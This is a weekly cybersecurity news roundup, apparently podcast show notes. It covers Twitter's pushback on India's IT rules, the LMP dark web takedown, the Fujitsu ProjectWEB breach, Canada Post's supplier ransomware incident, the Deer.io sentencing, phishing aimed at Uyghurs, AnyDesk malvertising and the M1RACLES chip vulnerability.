Twitter urges Indian government to respect free speech
On Thursday, Twitter responded to India’s new heavy-handed regulations that give authorities greater control over online media and internet platforms. The San Francisco-based social media service received a notice of noncompliance with India’s new laws along with a request to remove posts critical of the government’s handling of the coronavirus and recently passed agricultural laws. In response, Twitter stated that they and many people worldwide, “have concerns with regards to the use of intimidation tactics by the police in response to enforcement of our global terms of service, as well as with core elements of the new IT rules.” Under Indian law, Twitter executives residing in India could face up to seven years in prison and fines if the company fails to remove content that it considers subversive or a threat to public order and national security.
French authorities take down their third dark web marketplace
Last week, French authorities seized their third dark web marketplace over the last four years by taking control of Le Monde Parallèle (The Parallel World), known more commonly as LMP. French officials indicated in a press release, “The two site administrators were arrested and LMP’s activities were disrupted.” LMP operated as a marketplace for French-speaking criminals to sell card data, narcotics, forged documents, and weapons. It also served as a support forum and training ground for new criminal groups to find partners for various criminal endeavors across France and Europe.
Japanese government’s data breached after Fujitsu compromise
Several Japanese government agencies including Japan’s Ministry of Foreign Affairs, its Cabinet Office Cyber Security Centre and the Ministry of Land, had files containing system information and email addresses stolen by attackers who were able to compromise Fujitsu’s ProjectWEB software-as-a-service platform. These incidents, along with a similar data breach reported last week at Tokyo’s Narita airport, have increased fears of additional supply-chain attacks due to ProjectWEB’s wide use within the Japanese private and public sectors. According to a spokesman from Fujitsu, “Fujitsu is currently conducting a thorough review of this incident, and we are in close consultation with the Japanese authorities. As a precautionary measure, we have suspended use of this tool, and we have informed any potentially impacted customers.”
(The Register and ThreatPost)
Canada Post suffers data breach after supplier ransomware attack
Canada Post informed 44 of its large commercial customers that a ransomware attack on one of its third-party service providers, Commport Communications, exposed names and mailing addresses of approximately 950,000 of their customers. Analysis revealed that attackers also accessed email addresses and phone numbers of roughly 3% of affected customers. Back in December 2020, a ransomware gang known as Lorenz posted on their site that they had breached Commport Communications during a ransomware attack and since then has leaked over 35 GB of data allegedly stolen during the attack. At the time of the attack, Canada Post stated that Commport did not believe that any of their data was accessed, however it now appears that this was not the case.
Thanks to our episode sponsor, Sumo Logic
Russian national jailed for operating stolen data and account platform
This week, the US Department of Justice (DoJ) announced that 30-year-old Russian national Kirill Victorovich Firsov has been jailed for 2.5 years for operating the Deer.io platform which was designed to sell stolen data and accounts. According to the DoJ, at the time of its seizure, Deer.io catered to 3,000 active stores with sales in excess of $17 million. Law enforcement found stolen accounts and personal information including names, addresses, telephone numbers, and Social Security numbers which could be accessed for subscription price of approximately $12 per month and paid via cryptocurrency. Firsov was arrested in New York City after flying into JFK airport from Moscow, Russia.
(ZDNet)
Chinese phishing attack disguises as human rights org to target Uyghurs
Security researchers from Check Point and Kaspersky have partnered to uncover a new Chinese phishing scam targeting the Uyghur ethnic minority group. The attack entails spoofed emails appearing to come from the United Nations Human Rights Council as well as from a fictitious human rights organization called TCAHF, designed to lure Uyghurs into installing a Windows backdoor. While the researchers have discovered only a handful of victims so far, nearly 12 million Uyghurs live in the north-west Xinjiang region. Check Point’s head of threat intelligence, Lotem Finkelsteen, stated, “We believe that these cyber-attacks are motivated by espionage, with the end-game of the operation being the installation of a backdoor into the computers of high-profile targets in the Uyghur community.”
Malvertising campaign distributed trojan via Google ads
On Wednesday, researchers from CrowdStrike publicized a clever malvertising network targeting AnyDesk that delivered a malicious installer via rogue Google ads appearing in the search engine’s results pages. The campaign, which is thought to have begun back in April, uses a malicious file masquerading as an AnyDesk setup executable to download a PowerShell implant and then exfiltrate system data. The researchers indicated, “This malicious use of Google Ads is an effective and clever way to get mass deployment of shells, as it provides the threat actor with the ability to freely pick and choose their target(s) of interest.” Upon notification, Google is said to have taken immediate action to pull the ad in question.
Unpatchable vuln in Apple’s new Mac chip
Developer and researcher Hector Martin has discovered a vulnerability in Apple’s new M1 silicon chip which allows the system register to be accessed by applications in user mode, also known as privilege level EL0. The bug, which has been tagged as CVE-2021-30747, has been cleverly named M1RACLES which now has its own website. While Martin notes the actual impact of the bug is minimal, he has produced “proof of concept” code showing how programs which aren’t supposed to exchange data can co-operate to do so without detection. Martin notes, “The vulnerability is baked into Apple Silicon chips, and cannot be fixed without a new silicon revision.”